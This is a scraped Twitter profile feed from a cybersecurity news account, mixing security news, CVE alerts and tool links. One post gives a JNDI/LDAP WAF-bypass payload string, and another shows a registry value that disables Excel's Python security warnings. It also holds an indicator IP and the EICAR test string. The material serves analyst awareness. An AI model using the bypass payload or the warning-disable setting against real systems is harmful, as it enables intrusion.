Cyber Security Topics (@Mawg0ud)'s Twitter Profile
Cyber Security Topics

@Mawg0ud

Daily posts for cybersecurity analysts about:

➟ RedTeam
➟ Incident Response
➟ Digital Forensics
➟ Threat Intelligence

ID:1159028583400124416

https://www.instagram.com/mawg0ud/
07-08-2019 09:08:42

1,3K Tweets

4,0K Followers

3,5K Following

HackGit (@hack_git)

🚀 Google Recaptcha Solver

A Python script to solve Google reCAPTCHA using the DrissionPage library.

github.com/sarperavci/Goo…

0xor0ne (@0xor0ne)

A two-part blog series on reverse engineering and vulnerability analysis of DJI drones' firmware.
Credits Nozomi Networks

Chain of weak Wi-Fi password cracking (CVE-2023-6951) followed by an unauthenticated HTTP APIs access (CVE-2023-6949) which allows for the exfiltration of

Matt Johansen (@mattjay)

The crux of the exploit lies in the persistence of files on GitHub’s CDN.

Files remain accessible even after the associated comment is deleted, a perfect setup for distributing malicious content.

vx-underground (@vxunderground)

17 AVs flag the newly released Team Fortress 2 64bit client as malware 😭

SHA256: 83fb94ef1accdc0071ef6221f8e5acf870a1df31ff26e04a8d58116402793911

Julien Chaumond (@julien_c)

we just shipped HuggingChat on iOS 💬

The app is super polished and gives you access to the community's best open AI models, on the go.

Give it a try!

link to Appstore below ⤵️

CISA Cyber (@CISACyber)

🚩Palo Alto Networks has released workaround guidance for a command injection vulnerability (CVE-2024-3400) affecting PAN-OS versions 10.2, 11.0 & 11.1. Apply workarounds asap 👉 cisa.gov/news-events/al…

tedix (@tedixh1)

In Critical Thinking - Bug Bounty Podcast Ep. 63 with Jason Haddix subdomain enumeration via reversed DMARC lookup was discussed (using dmarc.live). I have created a tool to automate these lookups: github.com/Tedixx/dmarc-s…

Kuba Gretzky (@mrgretzky)

Really interesting how easy it is to fingerprint TLS connections established from GO applications, by checking JA4 signature patterns.

You'd be amazed how many automated malicious URL scanners also use the same JA4 signature.

From: github.com/FoxIO-LLC/ja4

Cyber Security Topics (@Mawg0ud)

swiftly addresses a 0 day vulnerability in its Windows desktop app, fixing a typo that could have allowed malicious Python scripts to bypass security warnings & execute automatically.



Source: ⬇️

bleepingcomputer.com/news/security/…

Cyber Security Topics (@Mawg0ud)

↠ Just a POV:

An advanced computer-brain interface enabled a woman who hadn't spoken for 18 years to communicate verbally once again.

✦ This time it is not a system, it is a human brain which might open the door for several fields including security ...

What do you think ?!

blackorbird (@blackorbird)

Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)

172.233.228[.]93

volexity.com/blog/2024/04/1…

Cyber Security Topics (@Mawg0ud)

WAF Bypass:

Transforming invalid Unicode characters like

${jnd${upper:ı}:ldap:URL}

into a legitimate 'I' using the upper function and potentially other Java string techniques.

This technique successfully evades numerous WAFs implemented.

Credits: EsotericSpyro

Cyber Security Topics (@Mawg0ud)

Registry key settings for Microsoft Excel Python are found at

HKCU\software\policies\microsoft\office\16.0\excel\security\PythonFunctionWarnings.

DWORD:
- 0: Disables all security warnings.
- 1: Enables security warning for 'Enable-Content'.
- 2: Blocks all Python execution.

Greg Linares (Laughing Mantis) (@Laughing_Mantis)

Ever want to test systems & see if your password is ever stored/sent in plaintext?

Make it: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

I am on the phone with a vendor right now because my test account is in an inoperable state.

🧐

Cybersecurity @ NIST (@NISTcyber)

NEWS! National Institute of Standards and Technology releases free, online introductory courses for the SP 800-53 security and privacy controls, SP 800-53A assessment procedures, and SP 800-53B control baselines.

Check them out: csrc.nist.gov/Projects/risk-…

Unit 42 (@Unit42_Intel)

2024-04-04 (Thursday): We generated an infection in a lab environment based on the latest round of #KoiLoader/#KoiStealer activity. Initial bank-themed lures started earlier this week on 2024-04-02. Some indicators available at bit.ly/3PQut3r #Unit42ThreatIntel